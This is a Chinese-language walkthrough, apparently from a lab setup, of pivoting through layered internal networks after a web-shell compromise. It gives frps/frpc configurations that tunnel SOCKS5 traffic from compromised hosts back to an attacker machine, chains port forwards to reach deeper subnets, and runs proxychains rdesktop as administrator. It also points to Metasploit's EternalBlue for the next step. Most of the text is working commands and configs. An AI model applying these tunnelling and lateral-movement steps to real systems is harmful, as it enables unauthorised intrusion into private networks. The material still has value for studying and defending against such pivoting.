目录
攻击机
查看服务端frps.ini配置文件
开启服务端frps
蚁剑打目标机
上传客户端frp到目标机
frpc.ini文件配置成
客户端打开代理frpc
vps显示成功客户端frpc打开
访问成功192.168.22.22的第二层内网主机
省去前面漏洞利用的rce过程,直接蚁剑开搞隧道代理
一层内网主机上传个frps服务端去连接二层内网主机
一层内网主机客户端配置转发30000端口
二层内网主机客户端配置
一层内网主机开启服务端
二层内网主机开启客户端
kali代理配置打
注意:这个地方要开启的是30000的proxychains去代理连接三层内网主机
成功连接,可以用proxychains利用msf的永恒之蓝打
需要用到frp这款工具,后台私信我获取
攻击机
查看服务端frps.ini配置文件
[common]
bind_port = 7000
root@iZt4njbm6gjpckh0e72p0lZ:~/frp#
开启服务端frps
chmod u+x frps
./frps -c frps.ini #开启frp
蚁剑打目标机
上传客户端frp到目标机
前面已将一层内网连接蚁剑的方式讲过,这篇frp的省去这个过程
chmod u+x frpc #给个执行权限
frpc.ini文件配置成
解读代码,它会抓发流量到你的攻击机192.168.20.128:20000
[common]
server_addr = 192.168.20.128
server_port = 7000[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000
客户端打开代理frpc
./frpc -c frpc.ini
vps显示成功客户端frpc打开
配置浏览器代理
访问成功192.168.22.22的第二层内网主机
省去前面漏洞利用的rce过程,直接蚁剑开搞隧道代理
一层内网主机上传个frps服务端去连接二层内网主机
一层内网主机客户端配置转发30000端口
[common]
server_addr = 192.168.20.128
server_port = 7000[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000[portfwd]
type=tcp
local_ip=127.0.0.1
local_port=30000
remote_port=30000
二层内网主机客户端配置
代码解读,二层内网主机连接一层的192.168.22.11:7000端口
[common]
server_addr = 192.168.22.11
server_port = 7000[2_socks_proxy]
type=tcp
plugin=socks5
remote_port=30000
一层内网主机开启服务端
二层内网主机开启客户端
kali代理配置打
注意:这个地方要开启的是30000的proxychains去代理连接三层内网主机
proxychains rdesktop -u administrator -p root 192.168.33.33
成功连接,可以用proxychains利用msf的永恒之蓝打
吗喽crazy,欢迎来交流